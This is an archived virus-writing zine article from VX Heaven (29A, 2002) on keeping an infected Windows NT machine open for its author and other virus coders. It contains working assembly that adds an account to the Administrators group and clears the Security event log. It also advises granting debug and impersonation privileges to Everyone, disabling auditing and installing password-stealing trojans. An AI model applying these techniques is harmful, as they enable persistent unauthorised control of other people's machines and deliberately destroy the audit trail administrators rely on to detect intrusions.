Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Opening NT boxes for you and your comrades in arms

Ratter
29a [6]
March 2002

[Back to index] [Comments]

Intro

You have infected a NT box and you're runned under the administrators group member security context. Now you can do everything you want with the machine. How to make the machine open for you even if you log in as a normal user?

Adding to administrators group

Of course you can add now every account to administrators group. It's probably the easiest way to achieve the full control of the machine everytime your virus is runned. However this is not very "stealth" because even the stupidiest admin worx with accounts and almost for sure will see it.

Adding account to an administrators group

; Apis are exported by advapi32.dll and netapi32.dll

        domain_name_buffer              db      100 dup(?)
        sid_buffer                      db      30 dup(?)

        @pushvar <dd    ?>                      ; SID_type
        @pushvar <dd    100>                    ; domain_name_buffer size
        push offset domain_name_buffer          ; domain_name
        @pushvar <dd    30>                     ; sid_buffer size
        push offset sid_buffer                  ; on output - sid
        @pushsz "account"                       ; account name
        push 0                                  ; system name - null is local system
        calle LookupAccountNameA

        push 1                                  ; one entry
        @pushvar <dd    offset sid_buffer>      ; entry buffer
        push 0                                  ; entry type ...
        call $+5+15*2                           ; group name
        dw      "a", "d", "m", "i", "n", "i", "s", "t", "r", "a", "t", "o", "r", "s", 0
        push 0                                  ; local system
        calle NetLocalGroupAddMembers
 

Adding needed privileges for Impersonation/Debug mode

This approach is much more clever. I won't paste the code from TaiChi here in this case bacause it's too extensive so have a look to the source of Win2k.TaiChi function add_privilegez. What it does? First it gets the Everyone group SID and then adds both needed privileges to this group. SeTcbPrivilege for impersonation and SeDebugPrivilege for Win32 subsystem infection support.

You can of course combinate both. If you'll use impersonation to achieve full control then don't forget to install a trojan or find another way to retrieve passwords. However if you'll use only Debug support then possibly better idea is to modify the Global Flags because it's a little bit more "stealth" :) Or you can code a NT kernel mode driver which would via IOCTL on demand modify NtGlobalFlag variable to let you infect the protected components.

Disabling auditing

If an admin is a good one has auditing on so those steps you did (adding privileges) got audited. It is good to disable auditing (see the function disable_auditing in TaiChi) so nothing gets logged ...

Clearing the security event log

This is the log where auditing messages are stored. After you disable them it's good to clear this one. See code snippet:

Clearing the security event log

; Used apis are exported by advapi32.dll

        ...
        @pushsz "Security"
        pop esi
        call clear_event_log
        ...

clear_event_log proc    near
        pushad
        @SEH_SetupFrame <jmp clear_event_log_end>

        push esi
        push 0
        call dword ptr [ebp+tOpenEventLogA]
        test eax, eax
        jz clear_event_log_end
        xchg eax, ebx

        push 0
        push ebx
        call dword ptr [ebp+tClearEventLogA]

        push ebx
        call dword ptr [ebp+tCloseEventLog]
clear_event_log_end:
        @SEH_RemoveFrame
        popad
        retn
clear_event_log endp
 

Although the message "Event log cleared" will appear, it will hide your previous steps and for the admin it will be harder to trace you. And of course this log can be cleared totally by using for example NTFS direct access.

Closing

If you make these steps the NT box is opened for everyone. Once logged in you can do what you want. Even if you don't plan to write NT viruses at least add to your babes a code for adding SeDebugPrivilege to Everyone. Then it makes for another viruses easier to infect the machine - remember your fellow coders too :)))

Ratter/29A - I'm a stranger in the world I haven't made
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua